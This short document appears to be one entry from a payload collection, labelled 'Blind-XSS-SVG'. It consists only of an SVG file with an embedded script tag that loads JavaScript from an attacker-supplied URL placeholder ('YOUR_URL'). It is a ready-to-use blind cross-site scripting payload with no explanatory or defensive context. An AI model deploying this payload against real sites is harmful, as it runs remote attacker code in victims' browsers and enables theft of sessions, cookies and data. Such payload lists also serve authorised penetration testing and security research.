Blind-XSS-SVG <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" > <script type="text/javascript" xlink:href="YOUR_URL"></script> </svg>